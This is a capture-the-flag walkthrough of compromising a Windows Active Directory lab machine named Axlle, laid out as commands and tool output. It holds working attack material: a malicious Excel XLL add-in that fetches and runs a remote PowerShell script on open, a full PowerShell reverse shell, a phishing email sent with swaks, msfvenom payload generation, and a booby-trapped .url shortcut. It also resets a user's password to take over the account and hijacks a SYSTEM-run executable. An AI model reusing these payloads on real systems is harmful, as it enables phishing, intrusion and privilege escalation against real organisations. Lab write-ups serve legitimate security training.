TCP Scan

> TARGET=10.129.77.43 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT      STATE SERVICE       REASON          VERSION
25/tcp    open  smtp          syn-ack ttl 127 hMailServer smtpd
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: FAF2C069F86E802FD21BF15DC8EDD2DC
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Axlle Development
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-06-22 22:16:25Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=MAINFRAME.axlle.htb
| Issuer: commonName=MAINFRAME.axlle.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-19T11:25:03
| Not valid after:  2024-11-18T11:25:03
| MD5:   acc1:ec10:1311:0c34:c548:bd34:8cce:53f9
| SHA-1: 9d6c:ac58:e52c:a711:9ffa:795f:171b:555c:cf0e:7fc9
| -----BEGIN CERTIFICATE-----
| MIIC6jCCAdKgAwIBAgIQVVwvBVAJjJ9KU24nlGQGOjANBgkqhkiG9w0BAQsFADAe
| MRwwGgYDVQQDExNNQUlORlJBTUUuYXhsbGUuaHRiMB4XDTI0MDUxOTExMjUwM1oX
| DTI0MTExODExMjUwM1owHjEcMBoGA1UEAxMTTUFJTkZSQU1FLmF4bGxlLmh0YjCC
| ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAM2LCqLiWgbUAoZDZqpnkO4I
| ydQrIBAT5BX0+R+OnEibrVE2pSqV0nfp4hAv1672OFsWB3iM8aDYDAmER5g+LRoz
| LkwyaeChgvzafcywL7RFAuW+1fCgbygdQTjvmEJwwwb6ZSbzZGAVMyXzEoKZBYsb
| 9jpgDdv9ukaQFFWSSVWMynwXDOVK/EYEDdD1NtLAdziNqe73n1nR+AibPz4ZW7Em
| pCz0g3Ir+Ql1MOY09sWoZ0TvzA/5LTSDd0ivH+VlfFQT12cNbdIZKSCwtOmjiuka
| T7URoEx4kMNVKKmj9M4CBTp4fUwECdwDYr/XHZE6MiZBd6T24AAYL16M2OQotyEC
| AwEAAaMkMCIwEwYDVR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0PBAQDAgQwMA0GCSqG
| SIb3DQEBCwUAA4IBAQDJHGe0pLywnHy+zofiDksI30sdsz7fNdstVz7IxZ07Cu1g
| 2mbiULCg/HYIWFMx1dJ5g/kwhiP7zswp/5VrJVTsCcSbxaVrIsu9apYN3LjGBxHh
| E4TTnljPtZSJSINyAdLMkeYT1N8502ZkaP8Ofeliwb6/IoDiPdmMyiWIJl23es4F
| kM705n8BiWJ3hpFHSpTUYNfiMbGmkneig9V9K1SQkf+ERezuQR1OPrX/JuAtpvcg
| ll8a4lhwT+mpf8LvcLl1NPoMgtrG+c7bb1tHgBLDrIvZ6fQAS/A4s5QKjbkn/Ew7
| iATUIyWSRw8YVEflYv8Qr7qynrY2aKhUB1UP1Znx
|_-----END CERTIFICATE-----
|_ssl-date: 2024-06-22T22:17:58+00:00; +3s from scanner time.
| rdp-ntlm-info:
|   Target_Name: AXLLE
|   NetBIOS_Domain_Name: AXLLE
|   NetBIOS_Computer_Name: MAINFRAME
|   DNS_Domain_Name: axlle.htb
|   DNS_Computer_Name: MAINFRAME.axlle.htb
|   DNS_Tree_Name: axlle.htb
|   Product_Version: 10.0.20348
|_  System_Time: 2024-06-22T22:17:18+00:00
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56192/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56208/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56557/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
56558/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
57078/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: MAINFRAME; OS: Windows; CPE: cpe:/o:microsoft:windows

• add entry

echo '10.129.77.43    axlle.htb  MAINFRAME.axlle.htb' >> /etc/hosts

smtp

> nmap --script smtp-commands.nse --script-args smtp-commands.domain=axlle.htb -pT:25,465,587 axlle.htb
PORT    STATE    SERVICE
25/tcp  open     smtp
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
465/tcp filtered smtps
587/tcp filtered submission

enum

Our website is currently down for maintenance.
We apologise for the inconvenience and appreciate your patience as we work to improve our online presence.
If you have any outstanding invoices or requests, please email them to accounts@axlle.htb in Excel format. Please note that all macros are disabled due to our security posture.
We will be back as soon as possible. Thank you for your understanding.

foothold

• https://github.com/edparcell/HelloWorldXll

download visual studio code
* need to install windows sdk
install excel 2013 sdk
get https://github.com/edparcell/HelloWorldXll
* swtich to a release build
* setup project to use latest vs and windows sdk
* setup include path, library path
* updata code in HelloWorldXll.cpp
* build

• HelloWorldXll.cpp

#include "stdafx.h"

short __stdcall xlAutoOpen()
{
	system("curl http://10.10.14.47/shell.ps1 | powershell -nop -W hidden -noni -ep bypass -f  -");
	return 1;
}

• revers shell

$client = New-Object System.Net.Sockets.TCPClient("ip",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

• trigger the exploit

> swaks --to accounts@axlle.htb --from it@axlle.htb --header "Subject: test" --body "check" --attach @test.xll --server axlle.htb --port 25

user: dallon.matrix

• in C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F

> type "{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml"
Return-Path: webdevs@axlle.htb
Received: from bumbag (Unknown [192.168.77.153])
 by MAINFRAME with ESMTP
 ; Mon, 1 Jan 2024 06:32:24 -0800
Date: Tue, 02 Jan 2024 01:32:23 +1100
To: dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb
From: webdevs@axlle.htb
Subject: OSINT Application Testing
Message-Id: <20240102013223.019081@bumbag>
X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/

Hi everyone,

The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.

We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.

Yours in click-worthy URLs,

The Web Dev Team

• generate reverse shell and setup smbserver

> msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.47 LPORT=5555 -f exe > reverse.exe
> impacket-smbserver -smb2support share $(pwd)

• trigger reverse shell

$url = "file:////10.10.14.47/share/reverse.exe"
$shortcutPath = "C:\inetpub\testing\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent

• setup meterpreter

use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 10.10.14.47
set lport 5555
set ExitOnSession false
exploit -j
-----


C:\>whoami
axlle\dallon.matrix

C:\Users>cd dallon.matrix
C:\Users\dallon.matrix>cd desktop
C:\Users\dallon.matrix\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is BFF7-F940

 Directory of C:\Users\dallon.matrix\Desktop

01/01/2024  04:45 AM    <DIR>          .
01/01/2024  04:44 AM    <DIR>          ..
06/22/2024  12:02 PM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,854,342,656 bytes free

C:\Users\dallon.matrix\Desktop>type user.txt
80ec56555fe60dd5ca74ca268e68223b

root

• check

PS C:\Users\Public\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

• run sharphound, group Web Devs has ForceChangePassword rights on jacob.greeny

sh.exe -c All --zipfilename output.zip

• https://github.com/nasbench/Misc-Research/blob/main/LOLBINs/StandaloneRunner.md
• import powerview

Invoke-WebRequest -URI http://10.10.14.47/PowerView.ps1 -OutFile PowerView.ps1
import-module .\PowerView.ps1

• Set New Password for Jacob.Greeny

$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass

> evil-winrm -i axlle.htb -u Jacob.Greeny -p SuperSecuredPassword123!

• enum as jacob.greeny, belongs to App Devs and can PSRemote to target

C:\>net groups "App Devs"
Group name     App Devs
Comment        Application Developers

Members

-------------------------------------------------------------------------------
baz.humphries            jacob.greeny
The command completed successfully.

• there is an automated process

C:\app development\kbfiltr> type README.md
...

**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**

• C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64\standalonerunner.exe can be overwritten by App Devs

> ICACLS "C:\*." /T /C 2>$null | findstr "App Devs"
> icacls "C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64\standalonerunner.exe"
C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64\standalonerunner.exe
        AXLLE\App Devs:(I)(RX,W)
        Everyone:(I)(R)
        AXLLE\Administrator:(I)(F)
        BUILTIN\Users:(I)(R)
        NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)
        BUILTIN\Users:(I)(RX)
        APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
        APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

• overwrite the existing standalonerunner.exe, keep overwriting it, there is a process constantly restoring it

> cd "C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64"
> wget http://10.10.14.47/reverse.exe -o standalonerunner.exe

• set ur meterpreter listener, wait for the admin to run standalonerunner.exe

PS C:\Users\Public\Documents> sessions 4

[*] Backgrounding session 2...
[*] Starting interaction with 4...

Shell Banner:
Microsoft Windows [Version 10.0.20348.2527]
-----

C:\>whoami
axlle\administrator

C:\>type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
3c98a1e6f463f86ce7723b1ff396afce

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack